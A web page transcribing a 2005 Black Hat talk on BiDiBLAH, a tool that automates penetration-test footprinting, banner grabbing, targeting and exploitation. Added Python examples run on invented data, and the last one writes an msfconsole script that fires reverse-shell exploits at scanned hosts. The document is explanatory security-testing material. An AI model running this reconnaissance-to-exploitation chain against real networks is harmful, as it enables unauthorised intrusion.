Sensepost assessment automation
Presentation by Roelof Temmingh at Black Hat USA in 2005.

This presentation is about the methodology behind BiDiBLAH, a tool developed by Roelof Temmingh which automates the footprinting and discovery process.
Transcript

  • 1. Assessment automation: Deus ex Machina || Rube Goldberg Machine? 2005, Las Vegas
  • 2. Before we begin... you can find all of this at:
     • http://www.sensepost.com/research/bidiblah
     • As promised at Amsterdam... E-Or release! http://www.sensepost.com/research/eor (web application scanner)
     • Time considerations...
     • Shows in Vegas...
  • 3. Introduction
     SensePost has done hundreds of external assessments, using a tried and trusted methodology. So... in search of an automated assessment tool. This talk is about:
     • What is this methodology?
     • Can it be automated?
     • Where does automation really work well?
     • Where does it simply suck?
     • Why does it fail? (and can it be corrected?)
     • Implications for penetration testers
  • 4. Principles of automation
     To have an automatic process we need to code it. To code it we need to have an algorithm or flow. In order to have an algorithm or flow we need to understand the process. To understand the process we need to have done it many times. If you cannot write the process down on paper you probably don't understand it completely.
     Exceptions to the rule: the root of all evil.
     Tradeoffs: if it will work in 99.99% of cases and will take me 2 months to code support for the 0.01% of cases... is it worth it?
  • 5. Weird perceptions
     Unix good... Windows baaaad! (meeaaaaa) 'Hard core' hackers will tell you that Windows sucks, and that GUI apps limit you from doing complex things. The problem is not the OS, it's the implementation of the GUI:
     • People think that, because it's a GUI app, it needs to be "dumbed down"
     • People think that, because it's a GUI app, it needs to be user friendly
     • People think that, because it's a GUI app, stupid people will use it
     Unix command line tools are mostly "fire and forget"; they are not interactive. Unix makes it hard to write X11 interfaces, so people stick to text based interfaces.
     BiDiBLAH uses "hot" text boxes: you can copy and paste, and grep and awk and sed all you wish.
  • 6. The demos you are about to see...
     BiDiBLAH is a tool for doing attacks/assessments. It's built for large networks... we don't have a large network... but our clients do... but we don't want to show their network... no... we don't... really...
     SO: Passive: IBM, Playboy. Active: SensePost/VMware.
     There's just too much risk in doing this live... but everything you see is real (some time lapse in places; I'll tell you where).
  • 7. SensePost external methodology
  • 8. Methodology: Footprinting
  • 9. Methodology: Footprint: Find domains
     Flow: initial domain -> TLD expansion and name expansion -> related domains -> content matching, network (MX/NS/IP) matching and meta data -> final domain matching list
  • 10. Methodology: Footprinting: Find subdomains
  • 11. Video 1 – BiDiBLAH’s footprinting : Sub domains (5 minutes)
  • 12. Methodology: Footprinting: Forward DNS entries
     Flow: domain / subdomain -> MX/NS records -> zone transfer (ZT) possible? If yes: take all forwards from the zone. If no: perform forward lookups from hit lists.
  • 13. Video 2 – BiDiBLAH’s footprinting : Forwards (3min per domain)
  • 14. Methodology: Footprint: Netblocks
  • 15. Video 3 – BiDiBLAH footprinting : NetBlocks
  • 16. Methodology: Footprint: Reverse DNS
  • 17. Video 4 – BiDiBLAH’s footprinting : Reverse DNS (5min/ClassC)
  • 18. Methodology: Footprint: Vitality
  • 19. Vitality : Async scanning
  • 20. Video 5 - BiDiBLAH – Vitality (SensePost network) 2min/port/classB
  • 21. Automation of footprint
     Pheeww... glad that's over! Which steps are difficult to automate & why?
     • Domain finding: works semi OK, but never complete [not implemented]; currently, you can learn a lot from reverse entries
     • Sub domain finding: easy [DONE]
     • Forwards: easy [DONE]
     • Netblocks: difficult... AS expansion is not always good for smaller (hosted) blocks; whois info on these blocks is pretty useless; no standard interface to registrars [currently set to manual]
     • Reverse scans: easy [DONE]
     • Vitality: easy [DONE (TCP only)]
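The footprinting steps of slides 9 to 21 (TLD expansion, network matching on MX records, subdomain hit lists, netblock derivation, and a reverse sweep that feeds newly discovered names back into the host list) as one runnable pipeline. This is an added example written for this page, not BiDiBLAH code; it runs against a constructed in-memory DNS table (invented names under example.test and RFC 5737 documentation addresses) so it works offline, and it collapses addresses to /24 netblocks as a stand-in for the netblock step the talk leaves manual. Swap the three resolve_* functions for real resolver calls to run it live.

```python
import ipaddress

# Constructed stand-in for live DNS answers (assumption: names and addresses
# are invented for the example). Replace resolve_a/resolve_mx/resolve_ptr
# with real lookups for a live run.
FAKE_A = {
    "example.test": ["198.51.100.10"],
    "www.example.test": ["198.51.100.10"],
    "mail.example.test": ["198.51.100.25"],
    "vpn.example.test": ["203.0.113.8"],
    "www.example.co.uk": ["198.51.100.10"],
}
FAKE_MX = {
    "example.test": ["mail.example.test"],
    "example.co.uk": ["mail.example.test"],
}
FAKE_PTR = {
    "198.51.100.10": "www.example.test",
    "198.51.100.25": "mail.example.test",
    "198.51.100.26": "backup.example.test",
    "198.51.100.200": "shared-host.isp.test",
    "203.0.113.8": "vpn.example.test",
}

def resolve_a(name):
    return FAKE_A.get(name, [])

def resolve_mx(name):
    return FAKE_MX.get(name, [])

def resolve_ptr(ip):
    return FAKE_PTR.get(ip)

def tld_expansion(domain, tlds):
    """Step 1: the same label under other TLDs (example.test -> example.co.uk, ...)."""
    label = domain.split(".")[0]
    return [label + tld for tld in tlds if label + tld != domain]

def related_domains(seed, candidates):
    """Step 2, network matching: keep candidates whose MX hosts live under the
    seed domain. A candidate that exists but points elsewhere is dropped."""
    return [c for c in candidates
            if any(mx == seed or mx.endswith("." + seed) for mx in resolve_mx(c))]

def find_subdomains(domain, hitlist):
    """Step 3: forward lookups from a hit list (the no-zone-transfer branch)."""
    found = {}
    for label in hitlist:
        name = f"{label}.{domain}"
        ips = resolve_a(name)
        if ips:
            found[name] = ips
    return found

def class_c_blocks(ips):
    """Step 4: netblocks. The talk keeps this manual; /24 grouping is a stand-in."""
    blocks = {ipaddress.ip_network(f"{ip}/24", strict=False) for ip in ips}
    return [str(b) for b in sorted(blocks)]

def reverse_sweep(block, keywords):
    """Step 5: PTR lookup for every address in the block, split by whether the
    name contains one of the target's domain keywords (content matching)."""
    ours, others = {}, {}
    for ip in ipaddress.ip_network(block).hosts():
        name = resolve_ptr(str(ip))
        if name is None:
            continue
        bucket = ours if any(k in name for k in keywords) else others
        bucket[str(ip)] = name
    return ours, others

def footprint(seed, tlds, hitlist):
    """Run the steps in order; return domains, hosts (name -> IPs) and netblocks."""
    domains = [seed] + related_domains(seed, tld_expansion(seed, tlds))
    hosts = {}
    for d in domains:
        if resolve_a(d):
            hosts[d] = resolve_a(d)
        hosts.update(find_subdomains(d, hitlist))
    ips = {ip for addrs in hosts.values() for ip in addrs}
    blocks = class_c_blocks(ips)
    keywords = sorted({d.split(".")[0] for d in domains})
    for block in blocks:
        ours, _others = reverse_sweep(block, keywords)
        for ip, name in ours.items():        # reverse entries reveal hosts the hit list missed
            hosts.setdefault(name, [])
            if ip not in hosts[name]:
                hosts[name].append(ip)
    return {"domains": domains, "hosts": hosts, "netblocks": blocks}

if __name__ == "__main__":
    result = footprint("example.test", [".test", ".co.uk", ".net"],
                       ["www", "mail", "vpn", "ftp"])
    for name, addrs in sorted(result["hosts"].items()):
        print(name, ",".join(addrs))
    print("netblocks:", result["netblocks"])
```

In the constructed data the reverse sweep turns up backup.example.test, which no hit list would have found, while shared-host.isp.test in the same /24 is kept out of the host list because its name does not match the target's keywords; that is the "you can learn a lot from reverse entries" point of slide 21, and also why a /24 sweep over a shared hosting block needs the content match rather than blind inclusion.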
  • 22. Why should you care about footprinting?? Finding one vulnerability on one box vs finding the one box with one vulnerability...
  • 23. SensePost external methodology So, where are we now?
  • 24. Methodology: Fingerprinting
     OS detection from the Internet to a firewalled host is difficult... not just technically, but conceptually: an Apache box protected by a FireWall-1 running on Win32 and 1:1 NAT will report itself as a Windows machine on a network level... but as a Unix machine on app level... so what will it be??
     BiDiBLAH does not try to do OS detection, but rather just does banner grabbing: async banner grabbing for 21, 22, 25, 80, 110, 143, and multithreaded 443 (SSL). Any banner/version can be grabbed asynchronously but it gets increasingly tricky...
  • 25. Async banner grabbing – the process
  • 26. Video 6 - BiDiBLAH: Async banner grabbing (2000 banners / 3 min)
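Async banner grabbing as described on slides 24 to 26, written as an added example for this page rather than BiDiBLAH's own code. It shows the distinction the slide glosses over: on FTP, SSH, SMTP, POP3 and IMAP the server talks first, while on HTTP the client must send a request before any version string comes back. The grabber also doubles as the vitality check of slide 19, since a refused or silent port comes back as None. To stay offline the demo starts local listeners on 127.0.0.1 that serve constructed banners (invented, not real hosts); TLS on 443 is not handled here.

```python
import asyncio
import re
import socket

# Ports where the server speaks first (FTP, SSH, SMTP, POP3, IMAP); on the
# others we must send a request to get a response header back.
SERVER_TALKS_FIRST = {21, 22, 25, 110, 143}
HTTP_PROBE = b"HEAD / HTTP/1.0\r\n\r\n"

async def grab_one(host, port, server_first=None, timeout=3.0):
    """Connect, collect up to 512 bytes of banner, return (host, port, banner or None).
    None means the port was dead or silent within the timeout."""
    if server_first is None:
        server_first = port in SERVER_TALKS_FIRST
    try:
        reader, writer = await asyncio.wait_for(asyncio.open_connection(host, port), timeout)
    except (OSError, asyncio.TimeoutError):
        return host, port, None
    try:
        if not server_first:
            writer.write(HTTP_PROBE)
            await writer.drain()
        data = await asyncio.wait_for(reader.read(512), timeout)
    except (OSError, asyncio.TimeoutError):
        data = b""
    finally:
        writer.close()
    banner = data.decode("latin-1", "replace").strip()
    return host, port, banner or None

async def grab_all(targets, concurrency=200):
    """Fan out over (host, port, server_first) tuples with a bounded number of sockets in flight."""
    sem = asyncio.Semaphore(concurrency)

    async def bounded(host, port, server_first):
        async with sem:
            return await grab_one(host, port, server_first)

    return await asyncio.gather(*(bounded(*t) for t in targets))

def banner_summary(banner):
    """Pick the line worth keying on: the Server: header for HTTP, else the first line."""
    if banner is None:
        return None
    m = re.search(r"^Server:\s*(.+?)\s*$", banner, re.M | re.I)
    return m.group(1) if m else banner.splitlines()[0]

# Constructed banners served by local demo listeners (assumption; not real hosts).
DEMO_BANNERS = {
    "ftp": (True, b"220 ProFTPD 1.2.10 Server ready.\r\n"),
    "smtp": (True, b"220 mail.example.test ESMTP Sendmail 8.13.1\r\n"),
    "http": (False, b"HTTP/1.0 200 OK\r\nServer: Apache/1.3.33 (Unix)\r\n\r\n"),
}

def demo():
    """Start one local listener per constructed banner plus one dead port,
    grab them all, and return {label: summary}."""
    async def run():
        async def listener(server_first, payload):
            async def handle(reader, writer):
                if not server_first:
                    await reader.readline()      # wait for the client's request line
                writer.write(payload)
                await writer.drain()
                writer.close()
            return await asyncio.start_server(handle, "127.0.0.1", 0)

        servers, targets = [], []
        for label, (server_first, payload) in DEMO_BANNERS.items():
            srv = await listener(server_first, payload)
            servers.append(srv)
            targets.append((label, "127.0.0.1", srv.sockets[0].getsockname()[1], server_first))
        # A port nothing listens on: bind, read the number back, release it.
        with socket.socket() as s:
            s.bind(("127.0.0.1", 0))
            targets.append(("dead", "127.0.0.1", s.getsockname()[1], True))
        results = await grab_all([t[1:] for t in targets])
        for srv in servers:
            srv.close()
        return {t[0]: banner_summary(r[2]) for t, r in zip(targets, results)}
    return asyncio.run(run())

if __name__ == "__main__":
    for label, summary in demo().items():
        print(f"{label:5} {summary}")
```

The semaphore is what makes "2000 banners in 3 minutes" safe in practice: without it, gather() opens every socket at once and the host runs out of file descriptors or trips the target's rate limiting. The slide's note that SSL on 443 was done with threads rather than async is the same concern in 2005 terms; today asyncio.open_connection(..., ssl=True) covers it.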
  • 27. SensePost external methodology So, where are we now?
  • 28. Methodology: targeting
     With a great deal of potential targets, we want to be able to select only those that really interest us. The targeting system should be able to target using:
     • Certain/all open ports (in all netblocks, or certain netblocks), e.g. all open on TCP 53
     • Keywords in service banners, e.g. wuftp*
     • Keywords in DNS names, e.g. PRT*
     • All hosts in a specific netblock, e.g. all in 172.16.43.0/24
     • Particular OSes or versions of an OS [a problem: we don't have it], e.g. MS Windows XP SP1
     • Certain keywords within vulnerability descriptions (more later), e.g. RPC*
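The targeting criteria of slide 28 as a selection function, added here as an example and not taken from BiDiBLAH. The inventory is constructed (invented hosts, banners and vulnerability notes in the shape the footprint and banner-grab steps produce), and the OS criterion is left out because, as the slide says, the tool has no OS data. The slide's patterns (wuftp*, PRT*, RPC*) are treated as case-insensitive shell globs that may match either the whole string or any dot- or space-separated token, which is the assumption that makes "wuftp*" hit a banner of "220 wuftp-2.6.0 ready".

```python
import fnmatch
import ipaddress
import re

# Constructed inventory in the shape the footprint + banner-grab steps produce
# (assumption: hosts, names, banners and vulnerability notes are invented).
HOSTS = [
    {"ip": "172.16.43.5", "name": "ns1.example.test",
     "ports": {53: "", 22: "SSH-1.99-OpenSSH_3.9p1", 111: ""},
     "vulns": ["RPC portmapper is listening on this port"]},
    {"ip": "172.16.43.20", "name": "ftp.example.test",
     "ports": {21: "220 wuftp-2.6.0 ready", 80: "Apache/1.3.33 (Unix)"},
     "vulns": []},
    {"ip": "172.16.44.9", "name": "PRT-LOBBY.example.test",
     "ports": {9100: "", 80: "HP-ChaiSOE/1.0"},
     "vulns": []},
    {"ip": "203.0.113.8", "name": "vpn.example.test",
     "ports": {443: "", 22: "SSH-2.0-OpenSSH_4.1"},
     "vulns": ["Export-grade SSL ciphers are enabled"]},
]

def glob_match(pattern, text):
    """Case-insensitive shell glob against the whole string or any dot/space
    separated token, so 'wuftp*' hits '220 wuftp-2.6.0 ready' and 'PRT*'
    hits 'PRT-LOBBY.example.test' but not 'export.example.test'."""
    p, t = pattern.lower(), text.lower()
    if fnmatch.fnmatchcase(t, p):
        return True
    return any(fnmatch.fnmatchcase(tok, p) for tok in re.split(r"[\s.]+", t))

def select_targets(hosts, port=None, netblock=None, banner=None, name=None, vuln=None):
    """Return IPs of hosts satisfying every criterion given (criteria are ANDed,
    so port=80 with netblock='172.16.43.0/24' means 'web servers in that block')."""
    net = ipaddress.ip_network(netblock) if netblock else None
    out = []
    for h in hosts:
        if net is not None and ipaddress.ip_address(h["ip"]) not in net:
            continue
        if port is not None and port not in h["ports"]:
            continue
        if banner is not None and not any(glob_match(banner, b) for b in h["ports"].values() if b):
            continue
        if name is not None and not glob_match(name, h["name"]):
            continue
        if vuln is not None and not any(glob_match(vuln, v) for v in h["vulns"]):
            continue
        out.append(h["ip"])
    return out

if __name__ == "__main__":
    print("TCP 53 open:      ", select_targets(HOSTS, port=53))
    print("banner wuftp*:    ", select_targets(HOSTS, banner="wuftp*"))
    print("name PRT*:        ", select_targets(HOSTS, name="PRT*"))
    print("172.16.43.0/24:   ", select_targets(HOSTS, netblock="172.16.43.0/24"))
    print("web in that block:", select_targets(HOSTS, netblock="172.16.43.0/24", port=80))
    print("vuln RPC*:        ", select_targets(HOSTS, vuln="RPC*"))
```

The token split matters more than it looks: a plain substring match for "RPC*" would also select the host whose only finding mentions export-grade ciphers, and every host with "export" in its name, so a targeting rule meant to pick out one class of service would silently widen the Nessus scan to unrelated boxes.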
  • 29. Video 7 – BiDiBLAH - Targeting
  • 30. SensePost external methodology So, where are we now?
  • 31. Methodology: Vulnerability discovery
     Why reinvent the wheel? Use a solid, widely used scanner: Nessus... Thus... we write a Nessus client. Give the user the ability to choose a set of plugins, and let him save the list. Thus you can choose *all* plugins (if you are doing an assessment), or you can choose one plugin (if you are looking throughout your whole network for a particular problem). Scans are executed against what was marked as targets.
  • 32. Video 8 - BiDiBLAH: Plugin selection
  • 33. Video 9 – BiDiBLAH vulnerability discovery
  • 34. SensePost external methodology So, where are we now?
  • 35. Methodology: Vulnerability exploitation
     Why reinvent the wheel? Use a solid, widely used exploitation framework: Metasploit! Thus... we write a Metasploit client.
     Problem with Metasploit: it's very operating system specific... and we DON'T KNOW the OS... Don't specify a target and hope for the best; hopefully it will brute force.
     Use Nessus to identify the weakness, Metasploit to exploit it. Thus... we need a Nessus ID to Metasploit sploit name list. We built it (thanks GP), and wrote plugins as needed. Hopefully it can be an attribute of the sploit (looks at HD...).
     RHOST, SSL, LHOST: all known to us. RPORT: known via the Nessus scan. Let the user choose the payload and additional parameters.
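The Nessus-to-Metasploit hand-off of slides 31 and 35: parse scanner output, join each finding to an exploit module by plugin ID, fill RHOST/RPORT/SSL/LHOST from what the scan already knows, and leave TARGET unset because the OS is unknown. This is an added example, not SensePost's list or client. The input is constructed in Nessus' pipe-separated .nbe export format (invented hosts; the 9000000x plugin IDs and the module names in the table are placeholders, not a real mapping), the SSL flag is inferred from the service name or port 443 (an assumption), and the output uses today's msfconsole option names (RHOSTS rather than the RHOST of the 2005 talk).

```python
import re

# Constructed lines in Nessus' pipe-separated .nbe export format (assumption:
# hosts and findings are invented; the 9000000x plugin IDs are placeholders):
#   results|subnet|host|service (port/proto)|plugin id|severity|description
NBE_SAMPLE = """\
timestamps|||scan_start|Thu Jul 28 10:00:00 2005|
results|198.51.100|198.51.100.25|smtp (25/tcp)|10263|Security Note|An SMTP server is running on this port
results|198.51.100|198.51.100.25|smtp (25/tcp)|90000001|Security Hole|Hypothetical remote overflow in the SMTP service
results|198.51.100|198.51.100.10|https (443/tcp)|90000002|Security Hole|Hypothetical overflow in the SSL web server
results|198.51.100|198.51.100.10|http (80/tcp)|10107|Security Note|HTTP Server type and version
results|198.51.100|198.51.100.10|general/tcp|90000002|Security Hole|Same finding reported without a port
timestamps|||scan_end|Thu Jul 28 10:20:00 2005|
"""

# Nessus plugin ID -> Metasploit module, the kind of table the talk says was
# built. These entries are placeholders (assumption), not the real list.
NESSUS_TO_MSF = {
    "90000001": "exploit/unix/smtp/hypothetical_smtp_overflow",
    "90000002": "exploit/multi/http/hypothetical_ssl_overflow",
}

PORT_RE = re.compile(r"^(\S+) \((\d+)/(tcp|udp)\)$")

def parse_nbe(text):
    """Yield one dict per 'results' line; 'general/tcp' style entries carry port None."""
    for line in text.splitlines():
        fields = line.split("|")
        if len(fields) < 7 or fields[0] != "results":
            continue
        m = PORT_RE.match(fields[3])
        yield {
            "host": fields[2],
            "service": m.group(1) if m else fields[3],
            "port": int(m.group(2)) if m else None,
            "plugin": fields[4],
            "severity": fields[5],
            "description": "|".join(fields[6:]),
        }

def plan_exploits(findings, lhost):
    """Join findings to the exploit table. The OS is unknown, so TARGET is left
    unset and the module's automatic target is relied on, as the slide suggests.
    SSL is inferred from the service name or port 443 (assumption)."""
    plans, seen = [], set()
    for f in findings:
        module = NESSUS_TO_MSF.get(f["plugin"])
        if module is None or f["port"] is None:
            continue                      # unmapped plugin, or no port to aim at
        key = (f["host"], f["port"], module)
        if key in seen:
            continue                      # same hole reported twice: one attempt
        seen.add(key)
        plans.append({"module": module, "RHOST": f["host"], "RPORT": f["port"],
                      "SSL": f["service"].lower() == "https" or f["port"] == 443,
                      "LHOST": lhost})
    return plans

def msf_resource(plans, payload="generic/shell_reverse_tcp"):
    """Render a msfconsole resource script (modern option name RHOSTS; the talk says RHOST)."""
    lines = []
    for p in plans:
        lines += [f"use {p['module']}",
                  f"set RHOSTS {p['RHOST']}",
                  f"set RPORT {p['RPORT']}",
                  f"set SSL {'true' if p['SSL'] else 'false'}",
                  f"set LHOST {p['LHOST']}",
                  f"set PAYLOAD {payload}",
                  "exploit -j"]
    return "\n".join(lines) + "\n"

if __name__ == "__main__":
    plans = plan_exploits(parse_nbe(NBE_SAMPLE), lhost="198.51.100.99")
    print(msf_resource(plans), end="")
```

Two details carry the slide's warnings. A finding Nessus reports against "general/tcp" has no port, so it is logged but never turned into an exploit attempt, and the dedup key stops a host that triggered the same plugin on two scans from being hit twice. What the script cannot do is pick a TARGET: that is exactly the gap the talk names, and the reason it hopes the module brute-forces or that the OS becomes an attribute of the exploit itself.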
  • 36. Video 10 – BiDiBLAH exploitation (VMware server)
  • 37. SensePost external methodology. So... we are done? In a perfect world... yes... In the real world we have false positives, we have to moderate Nessus results, and we have to write !=*|||(ing reports!!!
  • 38. Video 11 - advanced targeting and reporting
  • 39. The bottom line
     BiDiBLAH does 80% of the work within 20% of the time it takes us. The last 20% of the work takes 80% of the project time. Some steps in the methodology are really hard to automate; this is usually where things are "non-standard", or an exception. It would hopefully raise the bar on mediocre "pen testing" companies.
     Release considerations
     Group 1: "Surely you will not release this to the world? You're arming script kiddies with dangerous point and click hacking tools!!?"
     Group 2: "Where do we download it?"
     Thus: crippled version (20 min run time, no save) released at http://www.sensepost.com/research/bidiblah. Full version available on request.
  • 40. EXTRA: E-Or release
     Web APPLICATION assessment tool: http://www.sensepost.com/research/eor